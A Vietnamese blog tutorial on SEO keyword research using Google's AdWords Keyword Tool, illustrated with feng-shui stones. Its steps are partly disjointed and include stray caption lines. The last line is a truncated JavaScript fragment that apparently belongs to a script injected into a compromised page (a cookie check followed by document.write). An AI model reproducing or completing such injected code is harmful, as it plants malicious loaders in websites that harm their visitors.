Nghiên cứu từ khóa trong SEO

Trước khi SEO một website thì việc phân tích và chọn từ khóa là không thể thiếu và gần như là quan trọng nhất. Từ việc phân tích và chọn từ khóa bạn có thể:

– Xây dưng mô hình SEO.

– Lập kế hoạch SEO tối ưu với các từ khóa đã chọn.

Tuy quan trọng như vậy nhưng việc phân tích từ khóa hiện nay của nhiều “webmaster” vẫn chưa được chính xác. Trong bài viết này tôi sẽ mô tả cách nghiên cứu và phân tích từ khóa trong SEO mà tôi áp dụng trong các dự án của mình. Để bài viết dễ hiểu và đơn giản, tôi sẽ lấy ví dụ việc nghiên cứu các từ khóa trong chính lĩnh vực đá phong thủy.

I. Lấy ý tưởng từ khóa.

Bước 1: Truy cập google.

Bước 2: Gõ từ khóa thuộc lĩnh vực cần nghiên cứu. Trong ví dụ là: Đá phong thủy.

Bước 3: Kéo xuống dưới cùng để xem các từ khóa liên quan đến Đá Phong thủy và lưu các từ này lại.

Công ty SEO

– Ngoài dựa vào Phần search của google tôi có thể lấy ý tưởng từ khóa từ bạn bè, sách vở hoặc chính đối thủ của mình. Sau khi lấy ý tưởng tôi tổng hợp được danh sách các từ khóa sau:

Công ty SEO | từ khóa ví dụ

II. Phân tích từ khóa.

– Bước 1: Truy cập Công cụ Adwords của google. Vào phần Keywords Tools trong mục Tools And Analysis.

Thiết kế web WordPress

Bước 5: Trong Keywords Tool, có 2 thuộc tính mà bạn cần điểu chỉnh lại khi nghiên cứu từ khóa đó là:
+ Match Type: chọn Exact: thuộc tính này cho kết quả số lượng người tìm kiếm chính xác cụm từ khóa mà bạn đã chọn.

+ Locations and languages: Chọn Việt Nam và tiếng Việt để hiển thị thống kê số lượt tìm kiếm của người dùng từ Việt Nam và bằng tiếng việt.

 

dịch vụ seo

Bước 6: nhập từ khóa đã lên ý tưởng. Và chọn Search.

blog wordpress

 

Bước 7. Sau khi có kết quả bạn chọn Local Monthly Searches dể Key words tools hiển thị số lượt tìm kiếm từ khóa từ cao xuống thấp nhé.

Công ty SEO | nghiên cứu từ khóa

– Sau khi search thì Keyword tools cũng hiển thị rất nhiều ý tưởng từ khóa cho bạn lựa chọn.

Công ty SEO | Keyword Idieas

 

Lưu ý:

– Khi lựa chọn từ khóa để SEO ngoài căn cứ vào số lượt tìm kiềm bạn cũng nên dựa vào độ cạnh tranh (Competition), nên chọn các từ có độ cạnh tranh Low hoặc Medium, nếu lĩnh vực của bạn bắt buộc phải SEO các từ có độ cạnh tranh cao, bạn nên xây dựng các chiến lược SEO mạnh và phù hợp với từ đó.

– Một số từ khóa chung chung khó xác định lĩnh vực thì keywords tools sẽ hiển thị số lượt người tìm kiếm rất lớn ví dụ như từ “game” chẳng hạn.

Công ty SEO | ví dụ từ game

 

 

 

  (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘